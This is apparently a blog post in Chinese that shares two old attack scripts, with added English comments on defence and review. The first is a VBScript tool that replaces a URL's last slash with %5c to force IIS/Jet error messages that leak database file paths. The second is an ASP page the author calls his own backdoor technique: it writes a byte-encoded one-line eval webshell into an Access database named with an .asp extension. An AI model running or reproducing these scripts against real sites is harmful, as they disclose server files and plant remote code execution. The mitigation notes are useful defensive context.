
N年前的两个脚本%5c暴库


' Windows Script Host driver. It asks for a URL, rewrites the last "/" of that
' URL to "%5c" (a URL-encoded backslash), requests the result through xmlpost,
' and searches the response body for error text that quotes a file path.
' The outcome is shown in an Internet Explorer window via openwin.
'
' NOTE(defense): everything below depends on the server sending a data-access
' error message that contains a filesystem path back to the client. Serving a
' generic error page to remote clients, opening the database by a fixed path
' outside the web root, and normalising or rejecting encoded backslashes in
' URL paths remove the text this script searches for.
' NOTE(detection): the request shape visible in this file is a POST with no
' body whose final path separator is "%5c"; that is usable as a log signature.

' Script-level variables; xmlpost assigns them with the response details.
dim xstatus,tstatus,vserver,vheader,vrsbody
geterror=inputbox("请输入网站,例如:http://www.hackerxfiles.com/files/list.asp?id=415","请输入网址","http://www.hackerxfiles.com/files/list.asp?id=415")
' Empty input (or a cancelled dialog) ends the script.
if geterror = "" then
msgbox("输入错误,程序结束!")
wscript.quit
end if

' Work on the reversed string so the first "/" met (chr(47)) is the last one
' of the original URL. Only that one is replaced (tem2 acts as a one-shot
' flag); "c5%" becomes "%5c" when the string is reversed back.
geterror=strreverse(geterror)
tem2=0
for i=1 to len(geterror)
if mid(geterror,i,1) = chr(47) and tem2=0 then
temp=temp & "c5%"
tem2=tem2+1
else
temp=temp & mid(geterror,i,1)
end if
next
geterror=strreverse(temp)


' xmlpost stores status, headers and body in the script-level variables.
call xmlpost(geterror)
' Banner line: Server response header followed by the numeric HTTP status.
errortext = vserver & " " & xstatus
' Three start/end marker pairs are tried in turn; getstr returns "[none]" when
' a pair is not found. The markers are Chinese-language error messages
' ("could not find file '...'", "'...' is not a valid path",
' "open registry key '...'"), presumably the localized Jet/ADO texts - confirm
' against a real response. The text between the markers is what gets reported.
basesaver = getstr(vrsbody,"找不到文件 '","'。</font>" & chr(10))
if basesaver="[none]" then
basesaver = getstr(vrsbody,"<font face="&chr(34)&"宋体"&chr(34)&" size=2>'","'不是一个有效的路径。")
end if
if basesaver="[none]" then
basesaver = getstr(vrsbody,"打开注册表关键字 '","'。</font>")
end if

' Build the HTML for the result window: the raw response body when nothing
' matched, otherwise only the extracted text.
' NOTE(review): vrsbody / basesaver come from the remote response and are
' concatenated into the markup without HTML encoding, so markup in the
' response is rendered as markup in the window opened below.
if basesaver = "[none]" then
allreturn= "<title>mappath出错获取数据库地址 lilo</title><body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><b>" & errortext & "</b><br><br><textarea rows='15' name='s1' cols='57'>" &vrsbody& "</textarea>"
else
allreturn= "<title>mappath出错获取数据库地址 lilo</title><body scroll='no' bgcolor='menu' style='border:0pt;margin-left:5pt'><b>" & errortext & "</b><br><br><textarea rows='15' name='s1' cols='57'>" &basesaver& "</textarea>"
end if

' Show the page, then bring the window to the front by its title text.
call openwin(allreturn)
set whshell = wscript.createobject("wscript.shell")
whshell.appactivate "mappath出错获取数据库地址 lilo"
'whshell.sendkeys ("%{tab}")
set whshell = nothing

' Percent-encodes the double-byte characters of vstrin and returns the result.
' Characters whose asc() value has a magnitude below &hff are copied through
' unchanged, so reserved ASCII characters (space, "&", "?" ...) are NOT
' encoded by this function.
' vstrin : text to encode.
' Returns: vstrin with each double-byte character written as "%HH%LL".
' NOTE(review): the high byte is obtained with "\ &hff" rather than "\ &h100".
' The two give the same result only while the high byte is below &hff, and
' hex() does not zero-pad single-digit values.
function urlencoding(vstrin)
    dim encoded, pos, ch, code, hibyte, lobyte
    encoded = ""
    for pos = 1 to len(vstrin)
        ch = mid(vstrin,pos,1)
        if abs(asc(ch)) >= &hff then
            code = asc(ch)
            ' asc() reports double-byte characters as negative 16-bit values;
            ' shift them into the 0..65535 range before splitting into bytes.
            if code < 0 then code = code + &h10000
            hibyte = (code and &hff00)\ &hff
            lobyte = code and &hff
            encoded = encoded & "%" & hex(hibyte) & "%" & hex(lobyte)
        else
            encoded = encoded & ch
        end if
    next
    urlencoding = encoded
end function

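' Converts a byte sequence (for example the responsebody of an XMLHTTP
' request) into a VBScript string.
' Bytes below &h80 are taken as single characters. Any other byte is treated
' as the lead byte of a two-byte character and combined with the byte after
' it. This matches double-byte code pages only; UTF-8 input is not decoded
' correctly - confirm the encoding of the source before relying on it.
' vin    : byte string / byte array readable with lenb, midb and ascb.
' Returns: the decoded text. A lead byte with no following byte (truncated
'          input) is replaced by "?" instead of raising a runtime error.
function bytes2bstr(vin)
    dim decoded, pos, total, leadbyte, trailbyte
    decoded = ""
    total = lenb(vin)
    pos = 1
    do while pos <= total
        leadbyte = ascb(midb(vin,pos,1))
        if leadbyte < &h80 then
            decoded = decoded & chr(leadbyte)
            pos = pos + 1
        elseif pos < total then
            trailbyte = ascb(midb(vin,pos+1,1))
            decoded = decoded & chr(clng(leadbyte) * &h100 + cint(trailbyte))
            ' the trail byte has been consumed together with the lead byte
            pos = pos + 2
        else
            ' Input ends in the middle of a two-byte character. Reading the
            ' missing byte would make ascb fail, so emit a placeholder.
            decoded = decoded & "?"
            pos = pos + 1
        end if
    loop
    bytes2bstr = decoded
end function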

' Sends one synchronous POST without a request body to iurl and stores the
' outcome in the script-level variables xstatus, tstatus, vserver, vheader and
' vrsbody. The function itself assigns no return value.
' iurl : URL to request.
function xmlpost(iurl)
' Every runtime error from here on is skipped. After a failed request the
' variables assigned below the failing statement keep their previous values,
' so the caller cannot tell a failure from an empty response.
on error resume next
' ipost is never assigned in the visible code, so this encodes an empty value
' and the result is not used afterwards.
ipost=urlencoding(ipost)
set xpost = createobject("microsoft.xmlhttp")
' third argument false = synchronous: send blocks until the response arrives
xpost.open "post",iurl,false
xpost.send
xstatus = xpost.status
tstatus = xpost.statustext
vserver = xpost.getresponseheader("server")
vheader = xpost.getallresponseheaders
' responsebody holds the raw bytes; bytes2bstr turns them into a string
vrsbody = bytes2bstr(xpost.responsebody)
set xpost = nothing
end function

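' Returns the text of vstring that lies between the first occurrence of
' istring and the next occurrence of dstring after it.
' vstring : text to search.
' istring : start marker (not included in the result).
' dstring : end marker (not included in the result).
' Returns : the enclosed text, or the literal "[none]" when either marker is
'           missing.
' The original body ignored vstring and always searched the script-level
' vrsbody; it also looked for dstring from the start of istring, which yields
' a negative length for mid() when the two markers overlap. Both are fixed
' here. Callers that pass vrsbody get the same result as before.
function getstr(vstring,istring,dstring)
    dim startpos, bodypos, endpos
    getstr = "[none]"
    startpos = instr(vstring,istring)
    if startpos = 0 then exit function
    ' first character after the start marker
    bodypos = startpos + len(istring)
    endpos = instr(bodypos,vstring,dstring)
    if endpos = 0 then exit function
    getstr = mid(vstring,bodypos,endpos-bodypos)
end function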

' Left-pads vnum with "0" characters until it is vlen characters long.
' vnum   : value to pad.
' vlen   : wanted minimum length.
' Returns: vnum itself, unconverted, when it is already vlen characters or
'          longer; otherwise a string of zeros followed by cstr(vnum).
function inttostr(vnum,vlen)
    dim zeros, counter
    if not (len(vnum) < vlen) then
        inttostr = vnum
        exit function
    end if
    zeros = ""
    counter = 1
    do while counter <= vlen-len(vnum)
        zeros = zeros & "0"
        counter = counter + 1
    loop
    inttostr = zeros & cstr(vnum)
end function

' Splits unstr on the delimiter vastr and returns a part of the result that is
' selected by mode.
' mode = -1      : the whole array of pieces
' mode = -2      : the upper bound of that array
' other mode < 0 : nothing is assigned (the result stays Empty)
' mode > ubound  : false
' otherwise      : the piece at index mode
function getsplit(unstr,vastr,mode)
    dim pieces, lastindex
    pieces = split(unstr,vastr)
    lastindex = ubound(pieces)
    if mode = -1 then
        getsplit = pieces
    elseif mode = -2 then
        getsplit = lastindex
    elseif mode < 0 then
        exit function
    elseif mode > lastindex then
        getsplit = false
    else
        getsplit = pieces(mode)
    end if
end function

' Opens a small Internet Explorer window through COM automation and writes the
' HTML in vttv into it. The function assigns no return value.
' vttv : HTML text to display.
function openwin(vttv)
set ie = wscript.createobject("internetexplorer.application")
ie.navigate "about:blank"
ie.visible = 1 
ie.toolbar = 0
ie.statusbar = 0
ie.width=500
ie.height=335
' busy-wait until the blank page has loaded; the loop body is empty, so it
' spins without sleeping
do while (ie.busy): loop
set doc = ie.document
doc.open
' NOTE(review): execute compiles and runs a VBScript statement assembled by
' placing vttv between two double quotes. In this file vttv contains text
' taken from the remote response, so a double quote or a line break in that
' text changes the statement that is executed: remote content is evaluated as
' script on the machine running this file. Passing the value as an argument
' ("doc.writeln vttv") writes it without evaluating it.
execute "doc.writeln " & chr(34) & vttv & chr(34)
doc.close
set ie=nothing
end function

另一个是我写的,向access里插入asp代码来当作后门,这应当是我的首创了,不过我也不知道有没有其他人更早发现。后来网上就流传开直接向数据库插入一句话来得到webshell。(这种做法成立的前提是数据库文件用了.asp这类会被脚本引擎解析的扩展名,并且放在站点目录内;把数据库放到web目录之外、不给数据文件使用可执行扩展名,就能避免。)不知不觉时光飞逝,4年过去了,人老了,难道只能怀旧吗?

<%
' Classic ASP page (VBScript). It opens the Jet/Access database named in db,
' creates a table with a single OLE-object column and appends one row of raw
' bytes to that column.
'
' NOTE(defense): the bytes appended below spell a server-side script element
' (runat=server, language=javascript) whose body hands a value from the
' request form to eval. The database file name used here ends in .asp; a data
' file with a script-mapped extension inside the web root is parsed by the
' script engine when requested, which is what makes the stored bytes
' executable - the accompanying text describes this as a backdoor.
' Keeping database files outside the web root, not giving data files
' script-mapped extensions, and scanning binary/OLE columns and .asp/.asa
' files for "runat=server" or eval on request input address this.

db="0123.asp" ' change this to your database path
set conn=server.createobject("adodb.connection")
' server.mappath resolves db relative to the current virtual directory
connstr="provider=microsoft.jet.oledb.4.0;data source="&server.mappath(db)
conn.open connstr
' add the notdownload table
' NOTE(review): create table raises an error if the table already exists;
' nothing in this block handles that.
conn.execute("create table notdownload(notdown oleobject)")
' write the <% data  (original comment; the bytes appended below form a script
' element, not that delimiter)
set rs=server.createobject("adodb.recordset")
    sql="select * from notdownload"
' 1 = adOpenKeyset cursor, 3 = adLockOptimistic lock: an updatable recordset
rs.open sql,conn,1,3
rs.addnew
    ' chrb(asc(...)) emits one byte per character, so the value is stored as
    ' single-byte text instead of a two-byte-per-character string
    rs("notdown").appendchunk(chrb(asc("<")) & chrb(asc("s")) & chrb(asc("c"))& chrb(asc("r")) & chrb(asc("i"))& chrb(asc("p"))& chrb(asc("t"))& chrb(asc(" "))& chrb(asc("r"))& chrb(asc("u"))& chrb(asc("n"))& chrb(asc("a"))& chrb(asc("t"))& chrb(asc("="))& chrb(asc("s"))& chrb(asc("e"))& chrb(asc("r"))& chrb(asc("v"))& chrb(asc("e"))& chrb(asc("r"))& chrb(asc(" "))& chrb(asc("l"))& chrb(asc("a"))& chrb(asc("n"))& chrb(asc("g"))& chrb(asc("u"))& chrb(asc("a"))& chrb(asc("g"))& chrb(asc("e"))& chrb(asc("="))& chrb(asc("j"))& chrb(asc("a"))& chrb(asc("v"))& chrb(asc("a"))& chrb(asc("s"))& chrb(asc("c"))& chrb(asc("r"))& chrb(asc("i"))& chrb(asc("p"))& chrb(asc("t"))& chrb(asc(">"))& chrb(asc("e"))& chrb(asc("v"))& chrb(asc("a"))& chrb(asc("l"))& chrb(asc("("))& chrb(asc("r"))& chrb(asc("e"))& chrb(asc("q"))& chrb(asc("u"))& chrb(asc("e"))& chrb(asc("s"))& chrb(asc("t"))& chrb(asc("."))& chrb(asc("f"))& chrb(asc("o"))& chrb(asc("r"))& chrb(asc("m"))& chrb(asc("("))& chrb(asc("'"))& chrb(asc("#"))& chrb(asc("'"))& chrb(asc(")"))& chrb(asc("+"))& chrb(asc("'"))& chrb(asc("'"))& chrb(asc(")"))& chrb(asc("<"))& chrb(asc("/"))& chrb(asc("s"))& chrb(asc("c"))& chrb(asc("r"))& chrb(asc("i"))& chrb(asc("p"))& chrb(asc("t"))& chrb(asc(">")))
    rs.update
    rs.close
set rs=nothing
' close the connection
conn.close
set conn=nothing
%>
